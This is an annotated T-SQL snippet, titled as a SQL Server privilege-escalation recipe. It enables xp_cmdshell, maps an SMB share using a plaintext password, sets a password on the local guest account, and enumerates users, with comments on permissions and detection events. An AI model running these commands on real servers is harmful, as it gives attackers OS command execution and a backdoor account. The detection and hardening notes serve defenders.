SQL Server 提权

  在数据库中开启 xp_cmdshell

-- Purpose: turns on xp_cmdshell via sp_configure, then uses it to run Windows
-- commands from inside SQL Server. Statement order matters: 'show advanced
-- options' has to be set and applied before 'xp_cmdshell' can be configured.
-- Changing options with sp_configure requires the ALTER SETTINGS permission
-- (held by the sysadmin and serveradmin fixed server roles), so this sequence
-- only succeeds for a login that is already highly privileged in the instance.
-- Review/detection: option changes are written to the SQL Server error log
-- (message 15457), which makes an unexpected flip of xp_cmdshell auditable.

-- Make advanced options visible to sp_configure; xp_cmdshell is one of them.
EXEC sp_configure 'show advanced options', 1
GO
-- Apply the pending configuration value to the running instance.
RECONFIGURE
GO

-- Enable xp_cmdshell (off by default). Hardening baselines expect it to stay 0.
EXEC sp_configure 'xp_cmdshell',1
GO
RECONFIGURE
GO

-- xp_cmdshell spawns a Windows command shell. For sysadmin callers the command
-- runs in the security context of the SQL Server service account, so the
-- effective OS privilege is whatever that service account holds; a low-privilege
-- service account limits the impact.
-- This call maps drive Z: to an SMB share on 192.168.11.1. The password and user
-- name are embedded in the command text in plaintext, so they end up wherever
-- the statement is captured (traces, audit logs, this page).
EXEC master..xp_cmdshell 'net use Z: \\192.168.11.1\192.168.11.4BACKUP "bst123456" /user:192.168.11.1\shuiniao'
GO
-- NOTE(review): presumably meant to drop the connection to 192.168.11.1; the
-- argument form as written looks non-standard for `net use` - TODO confirm.
exec master..xp_cmdshell 'net use \\192.168.11.1\ del'
-- Sets a password on the local 'guest' account through the OS `net user` command.
-- Detection: Windows Security events 4724 / 4738 for the account change, and
-- process creation (4688) showing cmd.exe with sqlservr.exe as the parent.
exec master..xp_cmdshell 'net user guest testtest123!'

  

-- Prints the OS account the shell runs as, then lists the local user accounts.
exec master..xp_cmdshell 'whoami&&net user'

 

 
